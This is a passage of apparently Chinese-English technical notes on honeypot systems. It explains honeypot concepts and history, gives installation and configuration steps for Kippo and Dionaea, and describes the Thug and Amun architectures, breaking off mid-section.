The Honeynet ProjectThe Honeynet Project
catalogue
1. 蜜罐基本概念 2. Kippo: SSH低交互蜜罐安装、使用 3. Dionaea: 低交互式蜜罐框架部署 4. Thug 5. Amun malware honeypots 6. Glastopf web honeypot 7. Wordpot 8. Conpot SCADA/ICS honeypot 9. phoneyc 10. shockpot 11. MHN(Modern Honey Network) 12. Database Honeypots 13. awesome-honeypots 14. Honey Drive 15. Dockpot 16. 我们该怎么利用蜜罐系统进行入侵分析 17. Detecting Honeypots(反检测-蜜罐检测技术) 18. DNS Honeypot
1. 蜜罐基本概念
蜜罐技术,通过蜜罐技术可以捕获到黑客的攻击规则,从而为我们提取、建模攻击模式提供数据基础
1. 蜜罐好比是情报收集系统。它是故意引诱黑客攻击的目标 2. 黑客入侵后,我们可以收集他的攻击轨迹,知道他是如何发动攻击的 3. 其中重要的一点机器是虚假的,攻击者需要花费时间攻破。在这段时间内,系统管理员能够锁定攻击者同时保护真正的机器 4. 能够学习攻击者针对该服务的攻击技巧和利用代码 5. 一些蜜罐能够捕获恶意软件,利用代码等等,能够捕获攻击者的0day,同时可以帮助逆向工程师通过分析捕获的恶意软件来提高自身系统的安全性 6. 在内网中部署的蜜罐可以帮助你发现内网中其他机器可能存在的漏洞
The exact definition of a honeypot is contentious, however most definitions are some form of the following
A honeypot is an "an information system resource whose value lies in unauthorized or illicit use of that resources"(from the www.securityfocus.com forum)
A more practical, but more limiting, definition is given by pcmag.com
A server that is configured to detect an intruder by mirroring a real production system(根据真实生产环境镜像出的系统). It appears as an ordinary server doing work, but all the data and transactions are phony. Located either in or outside the firewall, the honeypot is used to learn about an intruder's techniques as well as determine vulnerabilities in the real system
0x1: 数据收集是设置蜜罐的另一项技术挑战
1) 蜜罐监控者只要记录下进出系统的每个数据包,就能够对黑客的所作所为一清二楚 2) 蜜罐本身上面的日志文件也是很好的数据来源。 3) 但同时要注意的是日志文件很容易被攻击者删除(尤其是对于高交互蜜罐),所以通常的办法就是让蜜罐向在同一网络上但防御机制较完善的远程系统日志服务器发送日志备份 4) 务必同时监控日志服务器。如果攻击者用新手法闯入了服务器,那么蜜罐无疑会证明其价值
0x2: 蜜罐的优势/劣势
1. 优点
1. 蜜罐系统的优点之一就是它们大大减少了所要分析的数据,对于通常的网站或邮件服务器,攻击流量通常会被合法流量所淹没,而蜜罐进出的数据大部分是攻击流量。因而,浏览数据、查明攻击者的实际行为也就容易多了 2. Fewer false positives since no legitimate traffic uses honeypot Collect smaller, higher-value, datasets since they only log illegitimate activity 3. Work in encrypted environments 4. Do not require known attack signatures, unlike IDS
2. 缺点
1. Can be used by attacker to attack other systems 2. Only monitor interactions made directly with the honeypot - the honeypot cannot detect attacks against other systems 3. Can potentially be detected by the attacker
0x3: 蜜罐技术的发展历史
蜜罐工具的发展历史: 1. 蜜罐工具DTK: 绑定在系统的未使用端口上,对任何想探测这些端口的攻击源提供欺骗性网络服务 2. LaBrea蜜罐软件: 接受网络上所有空闲IP 地址的TCP 连接,并通过TCP 协议中的窗口调节与持久连接等技巧实现一种Tarpit 服务,能够尽可能地拖长无效连接的持续时间,从而减缓网络扫描探测与蠕虫传播的速度 http://support.microsoft.com/kb/842851/zh-cn 3. Honeyd 著名安全专家Provos开发的一款"虚拟蜜罐框架性开源软件" 1) 引入了在网络协议栈层次上模拟各种类型蜜罐系统的方法 2) Honeyd 支持在"协议栈指纹特征"上伪装成指定的操作系统版本,对攻击者利用nmap 等工具实施主动指纹识别进行欺骗 3) 支持模拟构建虚拟网络拓扑结构,并以插件方式提供对各种应用层网络服务的模拟响应 4) 利用Honeyd软件, 安全研究人员可以很容易地按照需求定制出一个包含指定操作系统类型与应用服务的蜜罐系统,用于蠕虫检测与应对、垃圾邮件监测等多种用途 5) 由于Honeyd 最早引入了网络协议栈层次上的蜜罐系统模拟机制,以及采用了可集成各种应用层服务蜜罐的灵活框架性结构,使其在蜜罐工具软件发展过程中具有举足轻重的重要地位 4. The Honeynet Project Giraffe Chapter 开发的Nepenthes蜜罐软件 1) 它继承了Honeyd 的网络协议栈模拟机制与框架性结构, 针对互联网上主动传播恶意代码的监测需求, 实现了可供大规模部署的恶意代码样本采集工具 2) 与之前蜜罐系统尝试模拟整个网络服务交互过程不同, Nepenthes 的基本设计原则是只模拟网络服务中存在安全漏洞的部分, 使用"Shellcode 启发式识别"与"仿真执行技术"来发现针
对网络服务安全漏洞的渗透攻击, 从中提取到主动传播恶意代码的下载链接,并进一步捕获样本 3) 这种机制使其较其他已有蜜罐工具对自动化传播恶意代码捕获更为高效 目前业内主流的蜜罐项目 The Honeynet Project http://www.honeynet.org/codeofconduct 5. Dionaea Nepenthes已被新一代恶意代码样本捕获蜜罐软件Dionaea所替代 1) Dionaea采用内嵌Python 脚本代码实现对漏洞服务的模拟 2) 同样采用Libemu来检测Shellcode 3) 并支持IPv6 与TLS 协议 4) Dionaea蜜罐软件是目前技术最为先进、体系结构最优化的虚拟蜜罐工具 6. GHH(Google hack honeypot) 1) 针对Web应用攻击威胁研究并开发的Web应用服务蜜罐 2) GHH针对搜索存有安全漏洞Web应用程序的Google Hacking技术来诱骗Web应用程序攻击并进行日志记录,可以发现命令注入、Web 垃圾邮件、博客垃圾评论注入、网页篡改、植入僵尸
程序、搭建钓鱼站点等各种攻击事件 7. HIHAT(high interaction honeypot analysistoolkit) 1) 可将任意的PHP应用程序自动地转换为提供充分交互环境的Web蜜罐工具 2) 并通过"透明链接方式"获取恶意Web访问请求, 从而对现有PHP应用程序所面临的威胁进行监测分析 8. Kojoney、Kippo蜜罐 1) 模拟为SSH网络服务进程, 记录每次SSH口令暴力破解所尝试使用的用户名与口令 2) 并在口令猜测成功之后为攻击者提供模拟的shell 执行环境 3) 对攻击源IP 地址、使用的SSH 客户端类型、输入的控制命令以及下载的攻击工具文件进行捕获与记录. 9. 客户端蜜罐工具软件Capture-HPC 1) 近年来,由于防火墙、入侵防御系统等网络边界防御机制的广泛应用,针对传统网络服务的渗透攻击变得 越来越难以成功实现,以浏览器与插件为主要目标的客户端渗透攻击逐渐成为互联网上的主流安全威胁 2) 而蜜罐技术也随着安全威胁热点的这一变化,演化出客户端蜜罐工具软件.Capture-HPC 3) 这是一个高交互式的客户端蜜罐框架,支持在Windows 虚拟机环境中运行IE,Firefox 等浏览器,并通过内核中的系统状态变化监控机制来检测浏览器当前访问的网页中是否包含客户端
渗透攻击代码 10. PhoneyC 1) 采用"浏览器仿真"与"Javascript动态分析技术"来对抗恶意网页脚本的混淆机制 2) 并通过模拟各种已知浏览器与插件安全漏洞来检测出恶意网页中包含的渗透攻击类型 3) 通过对Javascript引擎进行opcode指令动态插装,实现了对恶意网页中的heapspray 堆散射攻击的检测能力.
0x4: 蜜罐技术的关键
1. 核心机制 核心机制是蜜罐技术达成对攻击方进行诱骗与检测的必须组件 1) 欺骗环境构建机制: 构造出对攻击方具有诱骗性的安全资源,吸引攻击方对其进行探测、攻击与利用,这里所谓的"安全资源"可以理解为存在受攻击面的一切资源,包括 1.1) 蜜罐所模拟的操作系统,即系统级漏洞,例如MS06-28 1.2) 蜜罐所模拟的系统服务、系统端口,例如RPC、SMP、FTP 1.3) 蜜罐所模拟的应用层服务: CMS系统、VoIP等 2) 威胁数据捕获机制: 对诱捕到的安全威胁进行日志记录,尽可能全面地获取各种类型的安全威胁原始数据: 2.1) 网络连接 2.2) 原始数据包 2.3) 系统行为数据 2.4) 恶意代码样本(.exe、shellcode) 3) 威胁数据分析机制: 在捕获的安全威胁原始数据的基础上,分析追溯安全威胁的类型与根源,并对安全威胁姿势进行感知 2. 辅助机制 对蜜罐技术其他扩展需求的归纳,主要包括: 1) 安全风险控制机制 2) 配置与管理机制 3) 反蜜罐技术对抗机制等 辅助机制的主要目标 1) 安全风险控制机制要确保部署蜜罐系统不被攻击方恶意利用去攻击互联网和业务网络,让部署 方规避道德甚至法律风险; 2) 配置与管理机制使得部署方可以便捷地对蜜罐系统进行定制与维护; 3) 反蜜罐技术对抗机制的目标是提升蜜罐系统的诱骗效果,避免被具有较高技术水平的攻击方利用反蜜罐技术而识别
0x5: 根据交互程度第蜜罐进行分类
1. Low-Interaction Honeypot(低交互蜜罐: 虚拟出一个服务) 1) 服务端蜜罐: DTK、LaBrea、Honeyd、Nepenthes、Dionaea 2) 应用层蜜罐: Glastopf、GlastopNG、SPAMPot、Kojoney、Kippo 3) 客户端蜜罐: PhoneyC 2. High-Interation Honeypot(高交互蜜罐: 旁路在一个真实的服务之后,进行蜜罐监控) 1) 服务端蜜罐: HoneyBow、Argos 2) 应用层蜜罐: GHH、HIHAT 3) 客户端蜜罐: Capture-HPC HoneyMonkey、SpyProxy 3. 粘性蜜罐(Tarpits): 这种类型的蜜罐,使用新的IP来生成新的虚拟机,模拟存在服务的漏洞,来做诱饵。因此攻击者会花费长时间来攻击,就有足够的时间来处理攻击,同时锁定攻击者 4. 专门捕获恶意软件的密码: 例如模拟出存在shelllock、jenklin、redis、strut2、udf漏洞的服务,诱使攻击者入侵后种植恶意程序,从而获取样本
Relevant Link:
http://dionaea.carnivore.it/ http://netsec.ccert.edu.cn/zhugejw/2011/09/08/kippo/ http://297020555.blog.51cto.com/1396304/553382/ http://netsec.ccert.edu.cn/zhugejw/files/2011/09/Kippo介绍PPT.pdf http://netsec.ccert.edu.cn/zhugejw/files/2011/09/Kippo-介绍.pdf http://www.2cto.com/Article/201403/285377.html http://blog.csdn.net/sealyao/article/details/6708923 http://security.ctocio.com.cn/securitycomment/414/8185414.shtml http://netsec.ccert.edu.cn/zhugejw/2011/09/08/kippo/ 面向蜜场环境的网络攻击流重定向机制的研究与实现.pdf Dionaea低交互式蜜罐介绍.pdf Collapsar.pdf 2007.通信学报.HoneyBow_一个基于高交互式蜜罐技术的恶意代码自动捕获器.诸葛建伟.pdf 蜜罐技术研究与应用进展.pdf Kippo介绍PPT.pdf Kippo-介绍.pdf Dionaea低交互式蜜罐部署实践.pdf http://ruo.me/index.php/archives/77 http://www.05112.com/anquan/wzaq/stwx/2014/0312/8400.html http://www.05112.com/anquan/wlgf/2013/0609/3444.html http://www.freebuf.com/articles/system/12696.html http://dionaea.carnivore.it/ https://en.wikipedia.org/wiki/Honeypot_(computing) https://www.projecthoneypot.org/index.php http://www.honeynet.org/ http://www.honeyd.org/background.php http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey.pdf https://www.honeynet.org/node/1267 http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-honeynet-project/bh-us-03-honeynet.pdf
The Honeynet Project
http://www.honeynet.org/project
2. Kippo: SSH低交互蜜罐安装、使用
Kippo是采用Python模拟出一个端口监听服务,模仿SSH服务端的样子与潜在的攻击者进行伪交互的一款开源软件
Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker
0x1: Features
1. Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included 2. Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included 3. Session logs stored in an UML Compatible format for easy replay with original timings 4. Just like Kojoney, Kippo saves files downloaded with wget for later inspection 5. Trickery; ssh pretends to connect somewhere, exit doesn't really exit, etc
0x2: REH5安装
1. rhel5下下载准备环境的的RPM包 python26-2.6-geekymedia1.i386.rpm python26-2.6-geekymedia1.src.rpm python26-debuginfo-2.6-geekymedia1.i386.rpm python26-devel-2.6-geekymedia1.i386.rpm python26-libs-2.6-geekymedia1.i386.rpm python26-test-2.6-geekymedia1.i386.rpm python26-tools-2.6-geekymedia1.i386.rpm tkinter26-2.6-geekymedia1.i386.rpm Twisted-10.2.0.tar.bz2 zope.interface-3.3.0.tar.gz pycrypto-2.0.1.tar.gz pyasn1-0.0.12a.tar.gz 2. 安装这些准备环境软件包 1) libTix8.4.so is needed by tkinter26-2.6-geekymedia1.i386 yum install tix tcl tk 2) 安装RPM包 rpm -ivh *.rpm 3) 安装Twisted tar -xvf Twisted-10.2.0.tar.bz2 cd Twisted-10.2.0 python26 setup.py build python26 setup.py install 4) 安装zope tar -xvf zope.interface-3.3.0.tar.gz cd zope.interface-3.3.0 python26 setup.py build python26 setup.py install 5) 安装pycrypto tar -xvf pycrypto-2.0.1.tar.gz cd pycrypto-2.0.1 python26 setup.py build python26 setup.py install 6) 安装pyasn1 unzip pyasn1-0.0.12a.tar.gz cd pyasn1-0.0.12a python26 setup.py build python26 setup.py install 3. 准备Kippo的日志记录环境 1) kippo需要把数据存放到数据库中,所以单独创建一个kippo的库 /etc/init.d/mysqld start mysql -uroot -p111 create database kippo; grant all privileges on kippo.* to kippo@'localhost' identified by 'kippo'; flush privileges; 2) 生成Kippo需要的数据表 cd /usr/local/src/kippo-0.5/doc/sql/ vim mysql.sql: 在头部加上一句: USE kippo mysql -ukippo -pkippo < mysql.sql 4. 安装Kippo,以非root用户运行 1) wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz 2) tar zxvf kippo-0.5.tar.gz 3) cd /usr/local/src/kippo-0.5 4) vim kippo.cfg 4) useradd kippo 5) chown -R kippo.kippo /usr/local/src/kippo-0.5 5) su -l kippo 6) cd /usr/local/src/kippo-0.5 7) ssh-keygen -t rsa ./private.key 28:a5:58:10:78:39:ee:ed:69:1c:9e:c1:b8:9f:81:57 kippouser@node2 7) ./start.sh 5. import MySQLdb, uuid exceptions.ImportError: No module named MySQLdb Failed to load application: No module named MySQLdb 1) 下载、安装setuptools wget http://pypi.python.org/packages/source/s/setuptools/setuptools-0.6c11.tar.gz --no-check-certificate tar zxvf setuptools-0.6c11.tar.gz cd setuptools-0.6c11 python26 setup.py build python26 setup.py install 2) 下载、安装mysql-python wget https://pypi.python.org/packages/source/M/MySQL-python/MySQL-python-1.2.3.tar.gz --no-check-certificate tar zxvf MySQL-python-1.2.3.tar.gz cd MySQL-python-1.2.3 python26 setup.py build python26 setup.py install 安装完毕 在客户机上进行远程登录 ssh root@192.168.159.128 -p 2222 输入密码123456(刚才在配置文件里配置的) 6. 通过日志或数据库查看记录 cd /usr/local/src/kippo-0.5 tail -10 log/kippo.log
程序启动后,SSH蜜罐就启动了,并监听来自外部的连接
Kippo会自动把所有访问轨迹都记录下来,并保存到Mysql中(如果你有配置的话),那怎么解读这些数据就是我们接下来的问题了,即数据可视化,从什么角度去分析这些数据,从原则上来讲,我们进行入侵分析,要做到以下几个方面:
1) 尽可能多的覆盖多的可能的访问路径,即尽可能多的模拟多一些主流的服务、端口、应用 2) 即可能全面的记录下所有的访问轨迹,在数据记录阶段应该广而杂地记录所有可能有用的信息,为一下进行数据提取、分层作准备 3) 从入侵、反入侵领域的角度去看待已经记录下的数据,建立相应的分析模型,这种模型应该具有很强的针对性。能直接、或间接地反映出入侵趋势、原因、强度
http://bruteforce.gr/kippo-graph,可以实现一定程度上的数据可视化,我们可以在它的基础上进行功能拓展,从而更好地对蜜罐捕获到的数据进行建模分析
SSH蜜罐可视化技术
0x3: Ubuntu 14.04 64安装
git clone https://github.com/desaster/kippo.git cd kippo pip install twisted pip install twisted --upgrade pip install PyCrypto pip install pycparser sudo apt-get install libffi-dev pip install cffi wget https://pypi.python.org/packages/source/c/cffi/cffi-1.5.2.tar.gz tar -zvxf cffi-1.5.2.tar.gz cd cffi-1.5.2 python setup.py install pip install idna pip install pyasn1 pip install enum34 pip install ipaddress pip install cryptography pip install cryptography --upgrade useradd littlehann su littlehann cp kippo.cfg.dist kippo.cfg ./start.sh
Files of interest
1. data: 存放ssh key,lastlog.txt和userdb.txt lastlog.txt:last命令的输出,即存储了登陆蜜罐的信息,也可以伪造 userdb.txt:可以登陆的用户,可以给一个用户设置多个密码,一个用户一行 格式为username:uid:password 2. honeyfs: etc目录中存在group hostname hosts issue passwd resolv.conf shadow这些 文件,cat /etc/filename目录中对应的文件时会显示这些文本文件中的内容. proc目录中存在cpuinfo meminfo version这些文件,cat /proc/filename目录中对应的文件时会显示这些文本文件中的内容. 3. log: 存放日志文件的地方,该目录包含一个kippo.log文件和tty目录 kippo.log:是存放启动记录,那些IP连接等信息 tty目录是每一个ssh过来后操作的记录,可以使用strings filename直接看到里面的内容 4. txtcmds: 存放命令的地方,这些命令都是文本文件,执行相关命令的时候直接显示文件内容 5. kippo: 核心文件,模拟一些交互式的命令等等 6. dl: wget等等下载的文件存放的地方 7. utils: convert32.py:把tty的日志转换为标准32位的小数格式,其实直接strings查看就可以了 createfs.py:可以用来模拟真实系统的一些文件目录之类的,不过需要设置一下需要重定向保存输出,然后去替换fs.pickle文件,这样就可以模拟真实系统了. 8. fsctl.py:用来修改已经生成的fs.pickle的文件,help有命令的帮助 9. passdb.py:是来添加账户密码的 10. playloh.py:对log/tty/下的日志进行回放的
Relevant Link:
关于Kippo的安装、配置参考以下文章 http://code.google.com/p/kippo/ http://www.haiyun.me/archives/centos-install-kippo.html http://297020555.blog.51cto.com/1396304/553382/ http://drops.wooyun.org/papers/4578 https://github.com/desaster/kippo
3. Dionaea: 低交互式蜜罐框架部署
Dionaea虽然也是一个低交互的蜜罐系统,但和Kippo不同的是,Dionaea集成了很多不同类型的蜜罐在一起,整体来说是一个框架的结构,方便开源社区进行扩展,支持FTP、HTTP、SSH、mysql、mssql、sip等协议的蜜罐模拟,我们可以使用它来部署更加贴近真实的蜜罐环境,从而能更有效的捕获攻击样本、和攻击轨迹数据
Dionaea 蜜罐的设计目的是诱捕恶意攻击,获取恶意攻击会话与恶意代码程序样本。它通过模拟各种常见服务:
1) 捕获对服务的攻击数据 2) 记录攻击源和目标IP、端口、协议类型等信息 3) 以及完整的网络会话过程 4) 自动分析其中可能包含的 shellcode 及其中的函数调用和下载文件,并获取恶意程序
Dionaea 的整体结构和工作机制
1) Dionaea是运行于Linux上的一个应用程序,将程序运行于网络环境下,它开放Internet上常见服务的默认端口,当有外来连接时,模拟正常服务给予反馈,同时记录下出入网络数据流。 2) 网络数据流经由检测模块检测后按类别进行处理,如果有 shellcode 则进行仿真执行 3) 程序会自动下载 shellcode 中指定下载或后续攻击命令指定下载的恶意文件。从捕获数据到下载恶意文件 4) 整个流程的信息都被保存到数据库中,留待分析或提交到第三方分析机构。
(图片来自Dionaea低交互式蜜罐介绍--诸葛建伟的paper)
Dionaea可以模拟的服务
1) SMB 2) http、https 3) ftp、tftp 4) MSSQL、MySQL 5) SIP (VoIP) 6) shellcode执行 7) malware下载、执行
关于Dionaea的安装、配置请参考以下文章
http://ruo.me/index.php/archives/77
http://www.05112.com/anquan/wzaq/stwx/2014/0312/8400.html
http://dionaea.carnivore.it/
1. 安装依赖 apt-get update apt-get install aptitude aptitude install libudns-dev aptitude install libglib2.0-dev aptitude install libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion
git-core flex bison pkg-config 2) 生成Dionaea的目录 mkdir /opt/dionaea cd /opt/dionaea 3) 安装其他依赖 cd /opt/dionaea 3.1) liblcfg git clone git://git.carnivore.it/liblcfg.git cd liblcfg/code autoreconf -vi ./configure --prefix=/opt/dionaea make install cd .. cd .. 3.2) libemu git clone git://git.carnivore.it/libemu.git cd libemu autoreconf -vi ./configure --prefix=/opt/dionaea make install cd .. 3.3) libnl apt-get install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev 3.4) libev wget http://dist.schmorp.de/libev/Attic/libev-4.04.tar.gz tar xfz libev-4.04.tar.gz cd libev-4.04 ./configure --prefix=/opt/dionaea make install cd .. 3.5) Python 3.2 wget https://www.python.org/ftp/python/3.2.2/Python-3.2.2.tgz tar xfz Python-3.2.2.tgz cd Python-3.2.2/ ./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/
-L/usr/lib/i386-linux-gnu/" make && make install cd /opt/dionaea/bin ln python3.2 /usr/bin/python3 cd .. 3.6) sqlite 3.3.7 wget http://www.sqlite.com.cn/Upfiles/source/sqlite-3.3.7.tar.gz tar xzf sqlite-3.3.7.tar.gz cd sqlite-3.3.7 mkdir /home/sqlite-3.3.7 ./configure --prefix=/home/sqlite-3.3.7 make && make install && make doc cd /home/sqlite-3.3.7/bin/ ln sqlite3 /usr/bin/sqlite3 3.7) Cython cd /opt/dionaea wget http://cython.org/release/Cython-0.15.tar.gz tar xfz Cython-0.15.tar.gz cd Cython-0.15 /opt/dionaea/bin/python3 setup.py install cd .. 3.8) libpcap wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz tar xfz libpcap-1.1.1.tar.gz cd libpcap-1.1.1 ./configure --prefix=/opt/dionaea make && make install cd .. 4) 编译安装dionaea git clone git://git.carnivore.it/dionaea.git cd dionaea autoreconf -vi ./configure --with-lcfg-include=/opt/dionaea/include/ \ --with-lcfg-lib=/opt/dionaea/lib/ \ --with-python=/opt/dionaea/bin/python3.2 \ --with-cython-dir=/opt/dionaea/bin \ --with-udns-include=/opt/dionaea/include/ \ --with-udns-lib=/opt/dionaea/lib/ \ --with-emu-include=/opt/dionaea/include/ \ --with-emu-lib=/opt/dionaea/lib/ \ --with-gc-include=/usr/include/gc \ --with-ev-include=/opt/dionaea/include \ --with-ev-lib=/opt/dionaea/lib \ --with-nl-include=/opt/dionaea/include \ --with-nl-lib=/opt/dionaea/lib/ \ --with-curl-config=/usr/bin/ \ --with-pcap-include=/opt/dionaea/include \ --with-pcap-lib=/opt/dionaea/lib/ make && make install
安装完毕后,可以采用后台运行的方式启动
Dionaea根据命令参数运行,可选择:
1) 不同的运行环境 2) 任务 3) 筛选事件 4) 记录内容
配置文件则具体规定:
1) 蜜罐运行后开启的模块 2) 记录文件的保存位置 3) 扩展功能的参数
默认配置下Dionaea自动选择一个网络接口进行监听
cd /opt/dionaea/bin 1) ./dionaea -l all,-debug -L '*' 2) ./dionaea -l all,-debug -L 'con*,py*' 3) ./dionaea -u nobody -g nogroup -r /opt/dionaea/ -w /opt/dionaea -p /opt/dionaea/var/dionaea.pid
Dionaea会在这些端口进行监听,并捕获来自潜在攻击者的访问轨迹数据
相比于Kippo,Dionaea因为架构庞大了许多,所以配置文件、模块结构看起来也复杂了许多,这也是正常的,我们可以把它和MSF的架构进行类比,就会发现很多异同点,Dionaea的服务模拟都是通过独立的模块,用python脚本予以实现,而配置文件中则包含了这些模块的相关信息
我们简单学习一下它的配置文件
Dionaea 默认下配置文件是/opt/dionaea/etc/dionaea.conf。配置文件内容分为: 1. logging 配置日志的存放部分、事件记录级别、所在域。包括普通日志和错误日志,默认下位于/opt/dionaea/var/log目录下,分别记录所有事件、警告、错误事件
2. processors 配置libemu、和用于导出数据流的模块streamdumper 3. libemu 可增减允许的协议,配置shellcode检测时支持的最大流大小、跟踪步数限制、和并发执行数等性能参数 4. streamdumper 配置导出数据流时允许和拒绝的协议、数据流保存的位置 5. downloads 配置恶意文件下载的保存的位置 6. bistreams 配置数据流保存的位置 7. submit 设置自动通过http提交恶意文件到特定地址,具体配置信息依赖于服务器的设定 8. listen 配置Dionaea进行监听的网络接口IP,默认下自动获取 9. modules 配置各种模块的工作参数。部分"必须模块": curl、libemu、pcap模拟的服务services等信息
对于蜜罐系统,数据可视化、数据建模解读永远是一个重点,关于Dionaea的捕获数据解析有以下方式
1. 使用dionaea附带的工具进行日志读取 cd /opt/dionaea/dionaea/modules/python/util python3 ./readlogsqltree.py -t $(date '+%s')-24*3600 /opt/dionaea/var/dionaea/logsql.sqlite python3 ./gnuplotsql.py -d /opt/dionaea/var/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd 2. 利用DionaeaFR进行可视化展示 cd /opt/ git clone https://github.com/RootingPuntoEs/DionaeaFR.git cd /opt/DionaeaFR 这个工具涉及到node.js、django等工具,之前没有接触过,不过感觉业内用它们做数据可视化挺多的,接下来准备入手研究一下,试试用node.js、django搞点好玩的 http://www.freebuf.com/articles/system/12696.html
4. Thug
1. Thug is a Python low-interaction honeyclient based on an hybrid static/dynamic analysis approach. 2. Thug provides a DOM implementation which is (almost) compliant with W3C DOM Core, HTML, Events, Views and Style specifications (Level 1, 2 and partially 3). 3. Thug makes use of the Google V8 Javascript engine wrapped through PyV8 in order to analyze malicious Javascript code and of the Libemu library wrapped through Pylibemu in order to detect and emulate shellcodes. 4. Currently 9 Internet Explorer (Windows XP, Windows 2000, Windows 7, Windows 10) 1) Microsoft Edge (Windows 10) 2) Chrome (Windows XP, Windows 7, MacOS X, Android 4.0.3, Android 4.0.4, Android 4.1.2, Linux, iOS 7.1, iOS 7.1.1, iOS 7.1.2, iOS 8.0.2, iOS 8.1.1, iOS 8.4.1, iOS 9.0.2) 3) Firefox (Windows XP, Windows 7, Linux) 4) Safari (Windows XP, Windows 7, MacOS X, iOS 7.0.4, iOS 8.0.2, iOS 9.1) personalities are emulated and about 90 vulnerability modules (ActiveX controls, core browser functionalities, browser plugins) are provided.
0x1: Build and Install
Relevant Link:
http://buffer.github.io/thug/doc/intro.html http://buffer.github.io/thug/doc/index.html
5. Amun malware honeypots
In this report we describe a low-interaction honeypot, whichiscapableofcapturingautonomousspreadingmalware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local harddisc, for further analyses. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.
0x1: Implementation
Amun is written in Python1, a small and simple scripting language. The honeypot is made up of different components
1. Amun Kerneli 2. Request Handler 3. Vulnerability Modules 4. Shellcode Analyzer 5. Download Modules 6. Logging Modules 7. Submission Modules
1. Amun Kernel
The Amun Kernel is the core component of the honeypot. This part contains the startup and configuration routines, as well as, the main routines of the software。During the startup phase
1. the Amun Kernel initialises the regular expressions that are used for shellcode matching 2. reads the main configuration file: "conf/amun.conf" 3. creates the internal logging modules 4. loads all external modules. 1) vulnerability modules: responsible for emulating single vulnerabilities 2) the logging modules: that log attack information to other services like databases 3) the submission modules, that for example write downloaded binaries to hard disc.
For each loaded vulnerability module, the Amun Kernel retrieves the list of accociated ports and stores the vulnerability module in an array with the port as key
Array ( [139] => Array ( [0] => vuln-netdde [1] => vuln-ms06040 ) [445] => Array ( [0] => vuln-ms08067 [1] => vuln-ms06040 [3] => vuln-ms06070 ) )
所以我们可以把多个vul module处理逻辑绑定在同一个端口上,例如80端口上存在多个漏洞
After all initial modules are loaded and the appropriate TCP servers are started, Amun Kernel enters the main loop.
During this loop,it iterates over all connected sockets
1. triggers download events 2. transfers information to certain modules 3. and re-reads the main configuration file for changes. The re-reading of the main configuration file allows to change certain settings during runtime. Amun does not have to be stopped and restarted.
2. Amun Configuration
Amun utilizes a single configuration file for adjusting all parameters necessary to run the honeyot
1. ip: It defines the IP address Amun will listen on during runtime. 1) It takes a single IP address as parameter 2) or the wildcard IP address 0.0.0.0 to listen on all addresses and interfaces assigned to the host system. 3) or IP address ranges (192.168.0.1 - 192.168.0.5) 4) or provide an interface name (e.g. eth0) 5) CIDR notation for networks (192.168.0.0/24) 6) or single comma separated IP adresses. 用逗号分隔多个IP项 2. a user and group can be defined, which limit the privileges of Amun. 3. timeout parameters, which adjust the way Amun timeouts connections, open ports, and download requests. As some attacks might not work correctly it is possible, that attackers for example do not connect to the requested port, therefore, Amun needs to close this port after a certain amount of time has been passed. The options are named: 1) connection timeout 2) bindport timeout 3) ftp timeout. 4. Amun also offers the possibility to reject certain attacking hosts from reconnecting in the case of certain events. These events are: 1) malware download was refused 2) download did not finish due to a timeout 3) a binary was already successfully downloaded 4) and the host already successfully exploited the honeypot 5. http header filesize check A lot of malware downloads use HTTP as transfer protocol and one feature of a HTTP server is to store the file size in the HTTP header of the reply. If check http filesize isenabled, Amun will compare the size of the downloaded binary with the value in received in the HTTP header. In case there is a mismatch, the downloaded file is discarded 6. replace local ip with attacker ip(将Shellcode中的内网IP替换为攻击者的来源IP) Whenever the Shellcode Analyzer extracts a download URL from the payload of an exploit, any found IP address is checked against a list of local IP addresses (e.g. 192.168.0.0/24). If replace local ip is enabled, Amun will replace all those IP addresses with the one of the attacker who send the exploit. Local IP addresses in shellcode occur whenever a host behind a Network Adress Translation (NAT) server is infected 7. submit modules contains the modules that are responsible of handling any downloaded binary. The default module that is loaded is the submitmd5 module, that simply stores any downloaded unqiue file to harddisc. Uniqueness is determined by the MD5 hash of the file. Additional modules of this type allow the transmission of binaries to external services like CWSandbox 8. The log modules modules that perform certain logging functionality. In most cases these modules send information to external intrusion detection systems. 9. vuln modules list contains all the vulnerability modules that should be load at the startup of Amun. modules listening on the same port answer to requests in the order they config in cile.
3. Request Handler
The Request Handler is responsible for all incoming and outgoing network traffic of the honeypot.
For every connection request, that reaches the Amun Kernel a Request Handler is created, that handles the connection until it is closed. The Request Handler maintains the list of loaded vulnerability modules and delegates the incoming traffic to those modules that are registered for the current port
Consider a connection coming in on port 445
1. if it is a new connection the Request Handler loads all vulnerability modules for port 445 by checking the vulnerability array at the key 445 2. In the next step the incoming traffic is distributed to each of the modules returned by the previous step. 3. Each of the vulnerability modules checks if the incoming traffic matches the service that is emulated and returns if it accepts or rejects the connection 4. As a result, the list of emulated vulnerabilities for a connection is thinned out with each incoming request of the attacker. 1) In the worst case none of the registered modules matches the attack pattern and the connection is closed 2) Otherwise, there is exactly one module left, which successfully emulates all needed steps performed by the attacker and receives the final payload containing the download information of the malware //Note that incoming network packets can be distributed to all registered vulnerabilitiy modules, but a reply can only be send by one. In the best case there should only be one module left to reply after the first packet is received, however, if there are more left, the reply of the first module in the list is chosen. 5. Connections that for some reason do not match any of the vulnerability modules, or do not fit an emulated service at any stage create a log entry in the Amun Request Handler log. This log contains information about the attacking host and the request that was send. This information help to update existing vulnerability modules or create new ones. 6. The Request Handler also receives the 